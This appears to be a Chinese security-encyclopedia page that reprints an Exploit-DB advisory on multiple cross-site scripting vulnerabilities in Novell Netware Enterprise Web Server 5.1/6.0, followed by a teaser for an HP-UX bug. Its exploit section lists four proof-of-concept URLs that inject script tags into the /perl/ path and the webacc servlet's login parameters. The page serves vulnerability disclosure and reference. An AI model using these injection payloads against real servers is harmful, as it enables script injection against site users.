Novell Netware Enterprise Web Server 5.1/6.0 – Multiple Cross-Site Scripting Vulnerabilities

Novell Netware Enterprise Web Server 5.1/6.0 – Multiple Cross-Site Scripting Vulnerabilities

漏洞ID 1054376 漏洞类型
发布时间 2004-01-23 更新时间 2004-01-23
图片[1]-Novell Netware Enterprise Web Server 5.1/6.0 – Multiple Cross-Site Scripting Vulnerabilities-安全小百科CVE编号 N/A
图片[2]-Novell Netware Enterprise Web Server 5.1/6.0 – Multiple Cross-Site Scripting Vulnerabilities-安全小百科CNNVD-ID N/A
漏洞平台 Netware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23589
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9479/info
   
Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server. 

http://www.example.com/perl/<sCRIPT>alert("d")</sCRIPT>.pl
http://www.example.com/perl/<script>alert('XSS')</script>.pl
http://www.example.com/servlet/webacc?User.id="><script>alert('XSS')</script>
http://www.example.com/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd
Oq&User.interface=frames&error=login&merge=webacc&action=User.Login&GWAP.ver
sion="><script>alert('XSS')</script>

相关推荐: HP-UX top覆盖文件漏洞

HP-UX top覆盖文件漏洞 漏洞ID 1205993 漏洞类型 未知 发布时间 2001-02-12 更新时间 2001-02-12 CVE编号 CVE-2001-0105 CNNVD-ID CNNVD-200102-017 漏洞平台 N/A CVSS评分…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享